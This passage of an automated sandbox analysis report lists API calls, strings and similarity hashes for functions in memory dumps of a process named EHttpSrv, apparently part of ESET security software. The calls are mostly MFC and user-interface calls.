• Instruction Fuzzy Hash: 2751BF716042009FD320DFA8CC89FAA77E4FB84B05F15852DF50A9B2E1EB78AC04CB91

APIs
• CopyRect.USER32(?,?), ref: 2042FCE3
• GetSysColor.USER32(00000010), ref: 2042FD0A
• #502.MFC80U(00000000,00000001,00000000,?,?,?,?), ref: 2042FD19
• #5638.MFC80U(?), ref: 2042FD2D
• #4117.MFC80U(?,?,?,?), ref: 2042FD3B
• #3995.MFC80U(?,?,?,?,?,?), ref: 2042FD46
• GetSysColor.USER32(00000014), ref: 2042FD55
• #502.MFC80U(00000000,00000001,00000000), ref: 2042FD64
• #5638.MFC80U(?,00000000,00000001,00000000), ref: 2042FD75
• #4117.MFC80U(?,?,?,?,00000000,00000001,00000000), ref: 2042FD83
• #3995.MFC80U(00000001,?,?,?,?,?,00000000,00000001,00000000), ref: 2042FD90
  • Part of subcall function 20414A70: #1925.MFC80U(FEEA6C22,?,?,?,00000000,2047B9E9,000000FF), ref: 20414AB9
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #3995#4117#502#5638Color$#1925CopyRect
• String ID:
• API String ID: 808909417-0
• Opcode ID: d5369b7e757a126f934308db32a224220a0138f8980baaedaffd951340689f7c
• Instruction ID: e14f29e5b98e428c45963c121036ff52c7d2d09c527758921efcaa37d713eb00
• Opcode Fuzzy Hash: d5369b7e757a126f934308db32a224220a0138f8980baaedaffd951340689f7c
• Instruction Fuzzy Hash: EE316271148380AFC300DF94C841BAFBBE8FB98B58F008A1DF545976A0DBB99908C752

APIs
• #4574.MFC80U(?,?,?,00000000,00000000,FEEA6C22), ref: 2042C5B9
• GetWindowRect.USER32(?,?), ref: 2042C5C7
• #6063.MFC80U(?,?,?,?,00000000,00000000,FEEA6C22), ref: 2042C5E7
• SendMessageW.USER32(?,00000401,00000001,00000000), ref: 2042C61C
• GetNextDlgTabItem.USER32(?,00000000,00000000), ref: 2042C630
• #2366.MFC80U(00000000,?,00000000,?,?,?,00000000,00000000,FEEA6C22), ref: 2042C633
• #2648.MFC80U(00000000,?,00000000,?,?,?,00000000,00000000,FEEA6C22), ref: 2042C642
• #1005.MFC80U(00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00000000,00000000,FEEA6C22), ref: 2042C65C
• GetNextDlgTabItem.USER32(?,?,00000000), ref: 2042C66B
• #2366.MFC80U(00000000,?,00000000,?,?,?,00000000,00000000,FEEA6C22), ref: 2042C66E
• SetForegroundWindow.USER32(?), ref: 2042C681
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #2366ItemNextWindow$#1005#2648#4574#6063ForegroundMessageRectSend
• String ID:
• API String ID: 1497975009-0
• Opcode ID: 268c60eebd982fa3f4b46541aedd3ff19783a7c4c468af2f59a84b9d4125b4fd
• Instruction ID: 4d4ed609ef2d3e0d73337d0b3a77375e0715c24aa2a2a879cd85335ae41d2d06
• Opcode Fuzzy Hash: 268c60eebd982fa3f4b46541aedd3ff19783a7c4c468af2f59a84b9d4125b4fd
• Instruction Fuzzy Hash: 5C219C71740A01AFD6149BB4CC85FAAB3A8BB44A04F00CA18FA1497690DB78F9158BA4

APIs
• #6232.MFC80U(00000001,?,2045509B,00000000), ref: 20455205
• #2651.MFC80U(000004DD,?,00000001,?,2045509B,00000000), ref: 20455218
• #2155.MFC80U(000004DD,?,00000001,?,2045509B,00000000), ref: 2045521F
• #2651.MFC80U(00000418,?,000004DD,?,00000001,?,2045509B,00000000), ref: 20455232
• #2155.MFC80U(00000418,?,000004DD,?,00000001,?,2045509B,00000000), ref: 20455239
• #2651.MFC80U(00000419,?,00000418,?,000004DD,?,00000001,?,2045509B,00000000), ref: 2045524C
• #2155.MFC80U(00000419,?,00000418,?,000004DD,?,00000001,?,2045509B,00000000), ref: 20455253
• #2651.MFC80U(000004DE,00000419,?,00000418,?,000004DD,?,00000001,?,2045509B,00000000), ref: 2045525F
• #2155.MFC80U(?,000004DE,00000419,?,00000418,?,000004DD,?,00000001,?,2045509B,00000000), ref: 20455271
• #2651.MFC80U(000004E0,000004DE,00000419,?,00000418,?,000004DD,?,00000001,?,2045509B,00000000), ref: 2045527D
• #2155.MFC80U(?,000004E0,000004DE,00000419,?,00000418,?,000004DD,?,00000001,?,2045509B,00000000), ref: 2045528F
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #2155#2651$#6232
• String ID:
• API String ID: 793604035-0
• Opcode ID: 32b24fc6810e55448ecad773b48f44faf7bf5a8371575952047a1bcdeaf18501
• Instruction ID: d9462817ed0175571ba0e8da9ac5a690567f16914b54dad8b74cc5d71aa63388
• Opcode Fuzzy Hash: 32b24fc6810e55448ecad773b48f44faf7bf5a8371575952047a1bcdeaf18501
• Instruction Fuzzy Hash: F6F031703806145BDD1993F05923BFF22AA8BA5F08F80C52C73465FAE0DD7C9D4283A5

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #764
• String ID: DESC$GROUP$GROUPNAME$OPTION_GROUPS
• API String ID: 441403673-1081468104
• Opcode ID: 5caa866b5bec255260ff46eacaaadd1735a882438c88b8a4e964155054608e62
• Instruction ID: 3bf162d876ada341dd8acd80099372fd476f95245a112324419e4c9907aadb9c
• Opcode Fuzzy Hash: 5caa866b5bec255260ff46eacaaadd1735a882438c88b8a4e964155054608e62
• Instruction Fuzzy Hash: 817192714083459BC320DFA4CC81F9BF7E8EF94658F408E2DF58992251E739E689CB92
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: swprintf_s
• String ID: DELETE$NODE;NAME=%s;TYPE=BINARY$NODE;NAME=%s;TYPE=DWORD$NODE;NAME=%s;TYPE=STRING$VALUE$xXH
• API String ID: 3896565401-115358340
• Opcode ID: 5c7fc1777b5df919b25d2c8d4360ef07eecc68e31c29cbc3e4a9f56370462f45
• Instruction ID: eb93d34df94da4c78f8e7e54604ab15d5e5f00135a11c63df88e6c2d678df026
• Opcode Fuzzy Hash: 5c7fc1777b5df919b25d2c8d4360ef07eecc68e31c29cbc3e4a9f56370462f45
• Instruction Fuzzy Hash: AB51A1B1640205AFD714DF94CC81BABB3AAFFD8604F10842DFD058B342DA79EE558BA1
APIs
  • Part of subcall function 20401670: malloc.MSVCR80 ref: 2040169E
  • Part of subcall function 20401670: malloc.MSVCR80 ref: 204016B0
  • Part of subcall function 20401670: free.MSVCR80 ref: 204016BD
• malloc.MSVCR80 ref: 2044183E
• free.MSVCR80 ref: 2044188C
• #1176.MFC80U(?,FEEA6CBE,-00003AB4,00000000), ref: 204418AC
• free.MSVCR80 ref: 204418B6
Strings
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: freemalloc$#1176
• String ID: <?xml version="1.0" encoding="utf-8"?>$<?xml version="1.0"?>$REMOVED$RULE$ZONE
• API String ID: 4268895495-836254500
• Opcode ID: e7cd42a809f30050df726940a87ca4e810be6a939bacf1d33c9071cf72ae487f
• Instruction ID: 9f0b7d97f9eb5a94f0670fd3c6cc8665c0975a643be5f1e627de16da5e0c2e04
• Opcode Fuzzy Hash: e7cd42a809f30050df726940a87ca4e810be6a939bacf1d33c9071cf72ae487f
• Instruction Fuzzy Hash: 0951D4B1E007009BE310AF95D881B1BB3E6AF94648F14C93DF949A7361E739ED45C792
APIs
• #310.MFC80U(FEEA6C22,?,?,?,00000000,?,?,?,?,?,?,?,00000000,FEEA6C22), ref: 20455DEB
• #764.MFC80U(?,?), ref: 20455EA1
• #265.MFC80U(00000000,?,?,00000000,?,?,?,?,?,?,?,00000000,FEEA6C22), ref: 20455EE5
• wcscpy_s.MSVCR80 ref: 20455F16
• wcsncpy_s.MSVCR80 ref: 20455F28
• #764.MFC80U(?,?), ref: 20455F6F
• #578.MFC80U ref: 20455FA6
• #1176.MFC80U(?,?,?,00000000,?,?,?,?,?,?,?,00000000,FEEA6C22), ref: 20455FC2
  • Part of subcall function 20464370: #310.MFC80U(FEEA6C22,?,?,?,?), ref: 204643C1
  • Part of subcall function 20464370: #310.MFC80U ref: 204643D6
  • Part of subcall function 20464370: #776.MFC80U(?), ref: 204643F5
  • Part of subcall function 20464370: #578.MFC80U ref: 20464782
  • Part of subcall function 20464370: #578.MFC80U ref: 20464797
  • Part of subcall function 2040E760: #764.MFC80U(000000FF,?,?,2040F2C9,?), ref: 2040E7A2
  • Part of subcall function 2040E760: #265.MFC80U(00000000,?,?,?,2040F2C9,?), ref: 2040E7E4
Strings
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #310#578#764$#265$#1176#776wcscpy_swcsncpy_s
• String ID:
• API String ID: 3470009779-3916222277
• Opcode ID: c17d74e14d23b0267385888c91c65e9388fc123ff68b39543be46123bcf6997a
• Instruction ID: b1d30187408b73940ea762bb02ff348248dda659718feac6957b8044c00cc79c
• Opcode Fuzzy Hash: c17d74e14d23b0267385888c91c65e9388fc123ff68b39543be46123bcf6997a
• Instruction Fuzzy Hash: 1F519C725082019FC310CF99C895A6BFBF5FF99708F458A2DF58997251D739EA08CB82
APIs
Strings
• ${PluginID}=, xrefs: 2043CFFE
• ESET, xrefs: 2043CFF4
• SECTION;ID=#01000103\SETTINGS\PLUGINS\PLUGIN;ID=#${PluginID}\PROFILES, xrefs: 2043D093
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: wcscpy_s$wcsncpy_s$LibraryLoad
• String ID: ${PluginID}=$ESET$SECTION;ID=#01000103\SETTINGS\PLUGINS\PLUGIN;ID=#${PluginID}\PROFILES
• API String ID: 2742677927-2568907538
• Opcode ID: 9acdf42161d0a6ae857dca1658d6c8f4ee2def6241f8a4135d57d38e82bec52e
• Instruction ID: b7d351eab212eaa2f05cd36c50a2d2e81fd49b828b755f13449f4648483a3c71
• Opcode Fuzzy Hash: 9acdf42161d0a6ae857dca1658d6c8f4ee2def6241f8a4135d57d38e82bec52e
• Instruction Fuzzy Hash: 4231B0711043016BD224DB94DC86FEBB3A4EF8CB08F408D28FA4597190FAB8E7098786
APIs
• #3793.MFC80U(?,?,?), ref: 2043669D
• #2870.MFC80U(00000000,?,00000001,?,?,?), ref: 204366B9
• SendMessageW.USER32(?,00001108,00000000,00000000), ref: 204366D1
• #2364.MFC80U(00000000), ref: 204366D4
• #1079.MFC80U(?,?,00000000), ref: 204366E6
  • Part of subcall function 204359A0: #1079.MFC80U(?,FEEA6C22), ref: 204359DB
  • Part of subcall function 204359A0: #6749.MFC80U(?,?,FEEA6C22), ref: 204359E7
• SendMessageW.USER32(?,00001108,00000002,00000000), ref: 20436712
• #2364.MFC80U(00000000), ref: 20436715
• #1079.MFC80U(?,?,00000000), ref: 20436727
Strings
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #1079$#2364MessageSend$#2870#3793#6749
• String ID: F
• API String ID: 2991566221-1304234792
• Opcode ID: b0febab9a186303612cc836f932a8f5a4e86fbd80f5503988fade0af5c6a8c80
• Instruction ID: a57e960a392a3614f539fb0410070a3646e4a01412dfdebd22928052e10d9277
• Opcode Fuzzy Hash: b0febab9a186303612cc836f932a8f5a4e86fbd80f5503988fade0af5c6a8c80
• Instruction Fuzzy Hash: BA316BB16043019FD304CF68C985E6AB7E9AFD8728F11C65DF9598B2A1DB74EC04CBA1
APIs
• #764.MFC80U(?,FEEA6C22,20462D01,?,?,20462D02,00000000,2047F1AF,000000FF,2040F2B9), ref: 2040F50D
• #764.MFC80U(?,FEEA6C22,20462D01,?,?,20462D02,00000000,2047F1AF,000000FF,2040F2B9), ref: 2040F524
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #764
• String ID:
• API String ID: 441403673-0
• Opcode ID: 0808462cedbabd20b5884375498f88a71f44ad62655173eaff27d5a7e5eb23c8
• Instruction ID: fb1f7dcdb237026851db330bbe5e016a424827fed1d1daf3b3ce9def077ef7e9
• Opcode Fuzzy Hash: 0808462cedbabd20b5884375498f88a71f44ad62655173eaff27d5a7e5eb23c8
• Instruction Fuzzy Hash: E391C0B16007058FC318CFAAC984A16B7E6FF80A04F45CA3DE16597B62EB39F905CB55
APIs
• #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,00000000,2047F1AF,000000FF,20462C1C,00000000,FEEA6C22,?,?,?,00000000), ref: 2040FD2D
• #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,00000000,2047F1AF,000000FF,20462C1C,00000000,FEEA6C22,?,?,?,00000000), ref: 2040FD3D
• #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,00000000,2047F1AF,000000FF,20462C1C,00000000,FEEA6C22,?,?,?,00000000), ref: 2040FD51
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #764
• String ID:
• API String ID: 441403673-0
• Opcode ID: 0de0c594c89703949700b21e89ff34eb91559637fc9680df67ca391849712aa0
• Instruction ID: fdd57cf25368fd12ac0ddc96e475a35c4369463dd417ef0d554794686523e5e5
• Opcode Fuzzy Hash: 0de0c594c89703949700b21e89ff34eb91559637fc9680df67ca391849712aa0
• Instruction Fuzzy Hash: F281AFB16006069BC718DFA4C880B6AB3A2FF44618F14CB3DE41A97B51E739F916CBC1
APIs
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: Rect$Empty$Copy$#1176
• String ID:
• API String ID: 3074543335-0
• Opcode ID: ee704bc4c26287894365f49b23ae69fd390b09f900afee5ad19f807f09f047d3
• Instruction ID: 6425a5c70b000b646e18035584e1580514c672a8c1e379eec86ee53e247cd090
• Opcode Fuzzy Hash: ee704bc4c26287894365f49b23ae69fd390b09f900afee5ad19f807f09f047d3
• Instruction Fuzzy Hash: F45147B69093059FC304DF55C88095BF7E8FFC8664F148A2EF99993350C735E9058BA2
                                                                                                                APIs
                                                                                                                • #516.MFC80U(00000258,00000000,00000038,FEEA6C22,00000000,-00003AB4,?,?,2047DA78,000000FF,204708E1,?,?,?,?,?), ref: 20461202
                                                                                                                  • Part of subcall function 20421B70: #572.MFC80U(FEEA6C22,?,?,2047A038,000000FF,2042055C,?,FEEA6C22,00000000,?,00000000,2047CF55,000000FF,204132FB,00000000), ref: 20421B97
                                                                                                                • #416.MFC80U(?,?,00000004,00000002,6C4E4310,6C4E60B9,00000258,00000000,00000038,FEEA6C22,00000000,-00003AB4,?,?,2047DA78,000000FF), ref: 20461250
                                                                                                                  • Part of subcall function 2045CF80: #530.MFC80U(FEEA6C22,00000222,000000FF,00000000,2047A55B,000000FF,2045D5C1,000001EB,00000193,000000FF,?,FEEA6C22,?,?,?,2047BED4), ref: 2045CFB1
                                                                                                                  • Part of subcall function 2045CF80: #6003.MFC80U(00000000,000000FF,FEEA6C22,00000222,000000FF,00000000,2047A55B,000000FF,2045D5C1,000001EB,00000193,000000FF,?,FEEA6C22), ref: 2045CFCD
                                                                                                                  • Part of subcall function 20430DC0: #310.MFC80U(?,FEEA6C22,00000000,?,00000000,?,2047AE6F,000000FF,20472632,?), ref: 20430DFC
                                                                                                                  • Part of subcall function 20430DC0: #557.MFC80U ref: 20430E0A
                                                                                                                  • Part of subcall function 20430DC0: #310.MFC80U ref: 20430E17
                                                                                                                  • Part of subcall function 20430DC0: #557.MFC80U ref: 20430E25
                                                                                                                  • Part of subcall function 20430DC0: LoadCursorW.USER32(00000000,00007F89), ref: 20430EA4
                                                                                                                  • Part of subcall function 20430DC0: SetRectEmpty.USER32(?), ref: 20430F17
                                                                                                                • GetSystemMetrics.USER32(00000032), ref: 204612B9
                                                                                                                • GetSystemMetrics.USER32(00000031), ref: 204612BE
                                                                                                                • #1555.MFC80U(00000000,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 204612C3
                                                                                                                • GetSysColor.USER32(00000005), ref: 204612CA
                                                                                                                • #1079.MFC80U(?,00000000,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 204612D8
                                                                                                                  • Part of subcall function 20427250: #1079.MFC80U(?,FEEA6C22), ref: 2042728B
                                                                                                                  • Part of subcall function 20427250: #6749.MFC80U(?,?,FEEA6C22), ref: 20427297
                                                                                                                • LoadIconW.USER32(00000000,00007F00), ref: 204612F1
                                                                                                                • #1079.MFC80U(?,000000FF,00000000,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 20461307
                                                                                                                  • Part of subcall function 204353D0: #1079.MFC80U(?,FEEA6C22), ref: 2043540B
                                                                                                                  • Part of subcall function 204353D0: #6749.MFC80U(?,?,FEEA6C22), ref: 20435417
                                                                                                                  • Part of subcall function 204353D0: #1176.MFC80U(?,?,FEEA6C22), ref: 20435444
                                                                                                                • DestroyCursor.USER32(00000000), ref: 2046131A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1079$#310#557#6749CursorLoadMetricsSystem$#1176#1555#416#516#530#572#6003ColorDestroyEmptyIconRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 2674052439-0
                                                                                                                • Opcode ID: 6c3ad7c6844278bfe69c59069823307c7561817536c503d72985468cfee20c1e
                                                                                                                • Instruction ID: 60706b079a469166a33850902dd76e6fd3e2fd33c4e96a0a9432f240cfdcbeb6
                                                                                                                • Opcode Fuzzy Hash: 6c3ad7c6844278bfe69c59069823307c7561817536c503d72985468cfee20c1e
                                                                                                                • Instruction Fuzzy Hash: 9B41F8702487419FD310DBB4CC45FAB7BE8AB95B48F00891CF295972D1DF786508C7A2
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 204242E9
                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 20424303
                                                                                                                • #310.MFC80U ref: 20424331
                                                                                                                • #2311.MFC80U(?,2048587C,?), ref: 2042434D
                                                                                                                • #6063.MFC80U(?), ref: 20424361
                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 20424376
                                                                                                                • #6063.MFC80U(?), ref: 204243A3
                                                                                                                • #578.MFC80U ref: 204243B7
                                                                                                                • #6063.MFC80U(20485878), ref: 204243CA
                                                                                                                • #6063.MFC80U(20485878,20485878), ref: 204243DA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #6063$MessageSend$#2311#310#578
                                                                                                                • String ID:
                                                                                                                • API String ID: 2015696880-0
                                                                                                                • Opcode ID: 447ab1278b4aef991080f4fe1f8f17b9d9c23f78e00517a53a2437dfbeeb8acc
                                                                                                                • Instruction ID: 533cb2f4fa421d0b21f496b9031ee3f598897521844714d2ed33fa21755c82f0
                                                                                                                • Opcode Fuzzy Hash: 447ab1278b4aef991080f4fe1f8f17b9d9c23f78e00517a53a2437dfbeeb8acc
